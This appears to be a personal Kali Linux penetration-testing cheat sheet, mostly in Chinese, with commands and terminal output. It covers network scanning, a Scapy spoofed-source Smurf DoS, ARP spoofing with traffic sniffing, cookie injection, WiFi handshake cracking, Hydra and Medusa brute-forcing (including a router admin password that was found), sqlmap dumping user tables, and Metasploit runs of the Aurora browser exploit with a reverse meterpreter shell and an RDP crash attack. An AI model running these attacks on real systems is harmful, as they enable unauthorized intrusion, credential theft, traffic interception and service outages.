Kali

TCP/IP三次握手的通信过程

ClientAndServerTCP/IP

nmap scripts:

root@kali:~# locate .nse | grep "http"
...
/usr/share/nmap/scripts/vtam-enum.nse
/usr/share/nmap/scripts/vuze-dht-info.nse
...

root@kali:~# nmap --script-help=telnet-ntlm-info.nse
telnet-ntlm-info
Categories: default discovery safe
https://nmap.org/nsedoc/scripts/telnet-ntlm-info.html
  This script enumerates information from remote Microsoft Telnet services with NTLM
  authentication enabled.
  Sending a MS-TNAP NTLM authentication request with null credentials will cause the
  remote service to respond with a NTLMSSP message disclosing information to include
  NetBIOS, DNS, and OS build version.

扫描内网设备

root@kali:~# netdiscover
 Currently scanning: 192.168.41.0/16   |   Screen View: Unique Hosts           
                                                                               
 5 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 228               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.2.1     xx:15:e1:xx:13:42      1      42  Phicomm (Shanghai) Co., Ltd.
 192.168.2.207   xx:e0:4c:xx:11:3d      1      60  REALTEK SEMICONDUCTOR CORP. 
 192.168.2.222   xx:39:56:xx:74:87      1      42  HMD Global Oy               
 192.168.2.214   xx:b8:37:xx:c5:11      2      84  Sony Mobile Communications I

root@kali:~# nmap -sn 192.168.2.1
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-05 05:00 UTC
Nmap scan report for phicomm.me (192.168.2.1)
Host is up (0.0013s latency).
MAC Address: 2C:15:E1:0A:13:42 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds

root@kali:~# nmap -sn 192.168.2.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-05 05:00 UTC
Nmap scan report for phicomm.me (192.168.2.1)
Host is up (0.0045s latency).
MAC Address: 2C:15:E1:0A:13:42 (Unknown)
Nmap scan report for LAPTOP-5893QA24.lan (192.168.2.207)
Host is up (0.0025s latency).
MAC Address: 00:E0:4C:36:11:3D (Realtek Semiconductor)
Nmap scan report for 192.168.2.222
Host is up (0.076s latency).
MAC Address: 20:39:56:CA:74:87 (Unknown)
Nmap scan report for 192.168.2.241
Host is up (0.072s latency).
MAC Address: 28:3F:69:C8:C6:23 (Sony Mobile Communications AB)
Nmap scan report for kali.lan (192.168.2.223)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 6.27 seconds

root@kali:~# nmap -[sn sT sS sA] 192.168.2.0/[24 16 8] | grep "("

scan ports

dmitry 192.168.2.1 -p # fast & easy
amap 172.16.36.135 80
nmap -[sS sT sU] 192.168.2.1 (-p 80-110)

NC

root@kali:~/Desktop/py# nc -nv 192.168.2.1 23
\xFF\xFD\x01\xFF\xFD\x1F\xFF\xFB\x01\xFF\xFB\x03

BusyBox v1.22.1 (2018-04-20 15:09:31 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

    ___  __ _______________  __  _____  ___  ________  ___
   / _ \/ // /  _/ ___/ __ \/  |/  /  |/  / / __/ __ \/ _ \
  / ___/ _  // // /__/ /_/ / /|_/ / /|_/ / _\ \/ /_/ / ___/
 /_/  /_//_/___/\___/\____/_/  /_/_/  /_/ /___/\____/_/
 ----------------------------------------------------------
 Barrier Breaker, unknown
 ----------------------------------------------------------
 PID=K2P
 BUILD_TYPE=release
 BUILD_NUMBER=189
 BUILD_TIME=20180420-145920
 ----------------------------------------------------------
 MTK OpenWrt SDK V3.4
 revision : 11a1c50c
 benchmark : APSoC SDK 5.0.1.0
 kernel : 144992
 -----------------------------------------------------
root@K2P:/# 

收集特定IP地址和服务端口的特征(amap 更好用):

root@kali:~/Desktop/py# amap -[b B] 192.168.2.1 23
amap v5.4 (www.thc.org/thc-amap) started at 2019-02-04 15:39:34 - BANNER mode

Banner on 192.168.2.1:23/tcp : \r\n\r\nBusyBox v1.22.1 (2018-04-20 150931 CST) built-in shell (ash)\r\nEnter 'help' for a list of built-in commands.\r\n\r\n

amap v5.4 finished at 2019-02-04 15:39:35

#nmap banner:
root@kali:~/Desktop/py# nmap -sT 192.168.2.1 -p 23 --script=banner
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-04 15:42 UTC
Nmap scan report for phicomm.me (192.168.2.1)
Host is up (0.0013s latency).

PORT   STATE SERVICE
23/tcp open  telnet
|_banner: \xFF\xFD\x01\xFF\xFD\x1F\xFF\xFB\x01\xFF\xFB\x03
MAC Address: xx:15:E1:0A:13:xx (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds

操作系统识别

Scapy

sr1(IP(dst='192.168.2.1')/ICMP())

if the reply's TTL is equal to or less than 64, the target device is Linux/Unix; otherwise it is Windows

nmap

# nmap 192.168.2.1 -O
Nmap scan report for phicomm.me (192.168.2.1)
Host is up (0.0015s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
23/tcp open  telnet
53/tcp open  domain
80/tcp open  http
MAC Address: 2C:15:E1:0A:13:42 (Unknown)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.20 seconds

xprobe2

xprobe2 192.168.2.214

[+] Host 192.168.2.1 Running OS: linux Kernel 2.6.11" (Guess probability: 95%)
[+] Other guesses:
[+] Host 192.168.2.1 Running OS: linux Kernel 2.4.19" (Guess probability: 95%)
[+] Host 192.168.2.1 Running OS: linux Kernel 2.4.22" (Guess probability: 95%)

onesixtyone & snmpwalk

# 找出设备上的SNMP Community字串
root@KaliLinux:~# onesixtyone 172.16.36.134 public
Scanning 1 hosts, 1 communities 
172.16.36.134 [public] Hardware: x86 Family 6 Model 58 Stepping 9  AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600  Uniprocessor Free)

# 下面这个工具我没有成功过
root@KaliLinux:~# snmpwalk 172.16.36.134 -c public -v 2c | cut -d "="  -f 2 
STRING: "Hardware: x86 Family 6 Model 58 Stepping 9 AT/AT COMPATIBLE  - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)" 
OID: iso.3.6.1.4.1.311.1.1.3.1.1 
Timeticks: (75376) 0:12:33.76 
"" 
STRING: "DEMO-72E8F41CA4" 

防火墙识别 - 判断远程端口是否被防火墙设备过滤
Ways to determine this:

nmap -sS 172.16.36.135
nmap -sA 172.16.36.135
#scapy
>>  sr1(IP(dst="192.168.2.1")/TCP(dport=22,flags='A'),timeout=1,verbose =1)

古老的Smurf DoS攻击

scapy

send(IP(dst="192.168.2.139",src="192.168.2.1")/ICMP(),count=100,verbose=1)

注:源 IP 地址被伪造为 LAN 上另一个系统的地址

放大攻击的原理是利用第三方设备,使网络流量压倒目标。 对于多数放大攻击,必须满足两个条件:

  1. 用于执行攻击的协议不验证请求源
  2. 来自所使用的网络功能的响应应该显著大于发出该请求所用的流量。

传统 smurf 攻击的效率取决于 LAN 上响应 IP 定向广播流量的主机数量。这些主机从伪造成目标系统地址的源 IP 接收 ICMP 广播回显请求,然后针对接收到的每个请求同时返回 ICMP 回显应答。

ARP 欺骗:

这个指令很简单,功能单一,不记得可以 arpspoof -h 查看。Note: after every reboot, IP forwarding must be re-enabled.

# arpspoof -i <device> -t <target_ip> <forward_to_ip>
# 首先要允许转发,否则目标无法上网: echo 1 >> /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.2.139 192.168.2.1

原理就是不断向目标发送"网关是我(192.168.2.1 is at 00:c9:xx:xx:13:9c)"来欺骗目标设备,当目标设备发包过来时候,我们再把包转发到真正的网关去。
然后打开wireshark进行抓包,http过滤规则:

http && ip.src == 192.168.2.139

driftnet -i wlan0 可查看嗅探到的图片。开两个窗口运行了两个arpspoof可以同时欺骗两台主机,但是不支持欺骗整个内网。

Firefox inject cookie:

不知道为什么装了油猴子后执行cookie inject在控制台中看到函数被denied了,无语只能自己鼓捣一个。注:某些浏览器不支持document.cookie同时设置多个cookie
Add this to FF: https://addons.mozilla.org/en-US/firefox/addon/custom-style-script/?src=search
Open the options page and add the code below (url: *)

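/**
 * Sets several cookies on the current page from one "k=v;k2=v2" string.
 *
 * document.cookie accepts only one cookie per assignment, so the input is
 * split on ";" and each non-empty fragment is assigned separately with
 * "path=/" appended. Note that per RFC 6265 a browser ignores a script
 * assignment to a cookie name that is already set with the HttpOnly flag,
 * so such cookies cannot be replaced this way.
 *
 * @param {string} cookieText - cookies separated by ";", e.g. "a=2;b=4".
 * @returns {undefined} logs the resulting document.cookie to the console.
 */
function addck(cookieText){
    var cookieArray = String(cookieText).split(";");
    for(var x=0; x<cookieArray.length; x++){
        // Trim stray whitespace and skip empty fragments (e.g. a trailing ";")
        // so that a bare "; path=/" is never assigned.
        var cookie = cookieArray[x].replace(/^\s+|\s+$/g, "");
        if (cookie === "") { continue; }
        document.cookie = cookie + "; path=/";
    }
    console.log(document.cookie);
}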
# usage: 控制台输入: addck("a=2;b=4;c=6")

WIFI破解

wifite & 网卡(支持监听模式)
运行 wifite --dict 字典文件。运行后选择指定wifi,这时候wifite就会自动寻找其连接的设备并踢掉,然后等待它们重新连接抓到wifi的握手包,存放在/root/hs目录下,并且自动破解wifi密码。
或者直接wifite获取握手包,然后在用:

aircrack-ng -w 字典 /root/hs/握手包

若破解不出来,可以重新获取握手包,再进行破解。

自带字典目录

/usr/share/wordlists/

dirb
big.txt #大的字典
small.txt #小的字典
catala.txt #项目配置字典
common.txt #公共字典
euskera.txt #数据目录字典
extensions_common.txt #常用文件扩展名字典
indexes.txt #首页字典
mutations_common.txt #备份扩展名
spanish.txt #方法名或库目录
others #扩展目录,默认用户名等
stress #压力测试
vulns #漏洞测试

dirbuster
apache-user-enum-** #apache用户枚举
directories.jbrofuzz #目录枚举
directory-list-1.0.txt #目录列表大,中,小 big,medium,small

fern-wifi
common.txt #公共wifi账户密码

metasploit
… #各种类型的字典

webslayer
general #普通字典目录
admin-panels.txt #后台路径 字典

Injections #注入字典目录
All_attack.txt #全部攻击
bad_chars.txt #字符注入
SQL.txt #sql注入
Traversal.txt #路径回溯
XML.txt #xml注入
XSS.txt #xss注入

others #扩展目录
common_pass.txt #通用密码字典
names.txt #用户名字典

stress #压力测试目录

vulns #漏洞测试目录
apache、iis、cgis…

webservices #web服务目录
ws-dirs.txt #路径测试
ws-files.txt #文件测试

wfuzz #模糊测试,各种字典…

在线破解

Findmyhash
在线哈希破解工具,借助在线破解哈希网站的接口制作的工具

字典生成

crunch [minimum length] [maximum length] [character set] [options]

-o:指定输出字典文件位置
-b:指定写入文件最大的字节数。该大小可以指定KB、MB或GB,必须与-o选项一起使用
-t:设置使用的特殊格式
-l:该选项用于当-t选项指定@、%或^时,用来识别占位符的一些字符
-p str1 str2 ...: 生成包含str的字典 如:str1 str4 str3 str2 即打乱顺序 (ps:前面的最大和最小长度仍然要输入且对结果无影响)
-t 2018%%%%: %代表数字 @代表小写字母 逗号代表大写字母

Cupp
社工字典,执行cupp -i,输入被攻击目标的姓、名、外号、生日、父母的名字、外号、生日、子女的名字、外号、生日等等一系列的信息。如果你有这些信息,直接输入,如果没有直接回车进行下一步。

Cewl
该工具可以通过爬行网站获取关键信息创建一个密码字典。例如输入一个url,它通过提取返回这个url页面源码标签中的一些内容,把这些内容组合成字典,对管理员密码的一个特定枚举就更高效一些。

Hydra
该工具支持几乎所有协议的在线密码破解,如FTP、HTTP、HTTPS、MySQL、MS SQL、Oracle、Cisco、IMAP和VNC等。

hydra -L ~/pwd/user.txt -P ~/pwd/pass.txt -F ftp://127.0.0.1:21
hydra -L ~/pwd/user.txt -P ~/pwd/pass.txt -F ssh://127.0.0.1:22
hydra -L ~/pwd/user.txt -P ~/pwd/pass.txt -F mysql://127.0.0.1:3306
hydra -l administrator -P /home/dict/pwd.lst 127.0.0.1 ftp -v (-s 21)
# hydra -l admin -P ~/pwd/pass.txt -F mysql://127.0.0.1:3306
# 大写L为指定文件中的用户名,小写l可直接提供单个用户名
hydra -l admin -P ~/pwd/pass.txt 192.168.2.1 http-post-form "/plugins/login.php:username=^USER^&password=^PASS^:login failed" -V

注:login failed为表单返回的登录失败消息
-V用于显示每次尝试的详细输出
:类似分割符
-o FILE 指定结果输出文件
-R 继续从上一次进度接着破解
-S 采用SSL链接(大写的S) 
-s PORT 如果非默认端口,可通过这个参数指定
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-w TIME 设置最大超时的时间:秒
-t TASKS 同时运行的线程数

更多操作看帮助或者使用其有UI的版本。
其UI版本——hydra-gtk中:如果要查看密码攻击的过程,将Output Options框中的Show Attempts复选框勾上
勾上Tuning选项卡下的Exit after first found pair,表示找到第一对匹配项时则停止攻击。
配置完后,单击到Start选项卡进行攻击。

Medusa
Medusa是通过并行登录暴力破解的方法,尝试获取远程验证服务访问权限。Medusa能够验证的远程服务,如AFP、FTP、HTTP、IMAP、MS SQL、NetWare、NNTP、PcAnyWhere、POP3、REXEC、RLOGIN、SMTPAUTH、SNMP、SSHv2、Telnet、VNC和Web Form等。
获取路由器的访问权:

# -e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
root@kali:~# medusa -h 192.168.5.1 -u admin -P /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/john.txt -M http -e ns 80 -F
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: (1 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (2 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 12345 (3 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: abc123 (4 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: password (5 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: computer (6 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 123456 (7 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: huolong5 (8 of 3109 complete)
ACCOUNT FOUND: [http] Host: 192.168.5.1 User: admin Password: daxueba [SUCCESS]

sql注入
sqlmap - py

# 监测是否存在sql注入漏洞
sqlmap -u http://www.xxx.com/news_detail.php?newsno=1
# 获取数据库名称
sqlmap -u http://www.xxx.com/news_detail.php?newsno=1 --dbs
# 获取 db01 数据库中的表名
sqlmap -u http://www.xxx.com/news_detail.php?newsno=1 -D dataname --tables
# 获取 users 表
sqlmap -u http://www.xxx.com/news_detail.php?newsno=1 -D dataname -T table_name --columns
# 导出
sqlmap -u http://www.xxx.com/news_detail.php?newsno=1 -D dataname -T table_name -C "id,user,password" --dump

jsql - UI
jSQL injection是一款由Java开发的SQL自动化注入工具,它提供了数据库查询、后台爆破、文件读取、Web shell、SQL Shell、文件上传、暴力枚举、编码、批量注入测试等功能,是渗透测试人员的有力助手。它支持GET/POST注入,同时也可以进行HTTP头注入(这个需要用户手动构建)

msf

Msf常用漏洞利用命令
search name:用指定关键字搜索可以利用的漏洞模块
use exploit name:使用漏洞
show options:显示配置选项
set option name option:设置选项
show payloads:回链攻击载荷
show targets 显示目标(os版本)
set TARGET target number(设置目标版本)
exploit(开始漏洞攻击)
sessions -l(列出会话)
sessions -i id(选择会话)
sessions -k id(结束会话)
Ctrl+z(把会话放到后台)
Ctrl+c(结束会话)
show auxiliary(显示辅助模块)
use auxiliary name (使用辅助模块)
set option name option(设置选项)
exploit(运行模块)

# 测试漏洞——ms10_018  IE浏览器漏洞实例——browser
msf > use exploit/windows/browser/ms10_002_aurora #(使用ms10_002_aurora模块)
msf exploit(ms10_002_aurora) > show options #(查看选项)
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.230.1 #(url地址)
msf exploit(ms10_002_aurora) > set SRVPORT 80 #(url地址端口)
msf exploit(ms10_002_aurora) > set URIPATH / #(网站根,默认就是/)
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp #(反弹载荷)
msf exploit(ms10_002_aurora) > set LHOST 192.168.230.185 #(payload反弹地址,写本机)
msf exploit(ms10_002_aurora) > set LPORT 1211 #(监听端口)
msf exploit(ms10_002_aurora) > exploit #(开始攻击)
msf exploit(ms10_002_aurora) > [*] Using URL: http://192.168.230.185:80/ #(生成url,此漏洞是极光漏洞,当我们把链接地址给目标访问,目标访问后就会反弹一个会话给本机)
msf exploit(ms10_002_aurora) > sessions -i #(查看目标)
sessions -i 1 #(选择id为1的主机)
Meterpreter > shell #(可以直接拿到主机的shell,然后可以执行系统命令)
# 测试漏洞——ms12_020 蓝屏攻击
msf > use auxiliary/scanner/rdp/ms12_020_check #(先用ms12_020_check模块扫描是否有漏洞)
msf auxiliary(ms12_020_check) > show options #(查看选项)
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.230.0/24 #(扫描目标网段)
msf auxiliary(ms12_020_check) > set THREADS 50 #(线程)
msf auxiliary(ms12_020_check) > exploit #(扫描后有vulnerable就说明有危险项)
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids #(利用ms12_020_maxchannelids漏洞)
msf auxiliary(ms12_020_maxchannelids) > show options #(查看选项)
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.230.129 #(选择有漏洞的主机)
msf auxiliary(ms12_020_maxchannelids) > set RPORT 3389 #(端口,可以不写,默认是3389)
msf auxiliary(ms12_020_maxchannelids) > exploit #(攻击)
# dll注入攻击——
msf > use exploit/windows/browser/webdav_dll_hijacker #(使用webdav_dll漏洞)
msf exploit(webdav_dll_hijacker) > show options #(查看选项)
msf exploit(webdav_dll_hijacker) > set SRVHOST 192.168.230.176 #(url地址)
msf exploit(webdav_dll_hijacker) > set SRVPORT 80 #(url端口)
msf exploit(webdav_dll_hijacker) > set URIPATH / #(网站根)
msf exploit(webdav_dll_hijacker) > set payload windows/meterpreter/bind_tcp #(反弹载荷)
msf exploit(webdav_dll_hijacker) > set LHOST 192.168.230.186 #(反弹监听地址)
msf exploit(webdav_dll_hijacker) > set LPORT 4444 #(反弹监听端口)
msf exploit(webdav_dll_hijacker) > exploit #(攻击)